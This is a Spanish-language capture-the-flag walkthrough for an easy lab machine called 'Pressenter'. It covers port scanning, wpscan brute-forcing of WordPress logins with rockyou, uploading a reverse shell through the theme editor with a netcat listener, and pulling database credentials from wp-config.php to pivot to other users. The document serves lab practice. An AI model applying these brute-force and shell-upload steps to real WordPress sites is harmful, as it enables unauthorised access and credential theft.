Pressenter

✍️ Autor: d1se0 🔍 Dificultad: Fácil 📅 Fecha de creación: 29/08/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p80 -v 172.17.0.2

para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web de CTF (está algo fea) puede ser que sea un WordPress.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xml

Revisamos el código fuente y encontramos un dominio por lo que hay que añadirlo en el archivo /etc/hosts.

Al ser un WordPress realizamos este comando para enumerar los usuarios y plugins.

wpscan --url http://pressenter.hl/ --enumerate u,vp

Realizamos fuerza bruta a través de la misma herramienta.

wpscan --url http://pressenter.hl/ --passwords /usr/share/wordlists/rockyou.txt --usernames pressi,hacker

Nos logueamos con esas credenciales.

🚀 EXPLOTACIÓN

Estamos dentro vamos a la sección de Herramientas en concreto Editor de archivos de temas para subir la Reverse Shell.

Al actualizar el archivo nos ponemos en escucha.

nc -lvnp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO.

Encuentro en el directorio /tmp un archivo que no se puede leer si no soy el usuario mysql por lo que voy a mostrar el contenido de wp-config.php.

cat /var/www/pressenter/wp-config.php

Encontramos un usuario y su contraseña.

mysql -u admin -p'rooteable' -h 127.0.0.1

Indagamos a ver si encontramos información relevante.

show databases;
use wordpress;
show tables;
select * from wp_usernames;

Encontramos las credenciales del usuario enter. Nos logueamos.

En el directorio del usuario hay una flag probablemente en el directorio root puede haber algo parecido por lo que realizamos este comando para escalar privilegios.

sudo /usr/bin/cat /root/root.txt

No tenemos suerte, voy a probar una solución más sencilla y es la misma contraseña sea para root.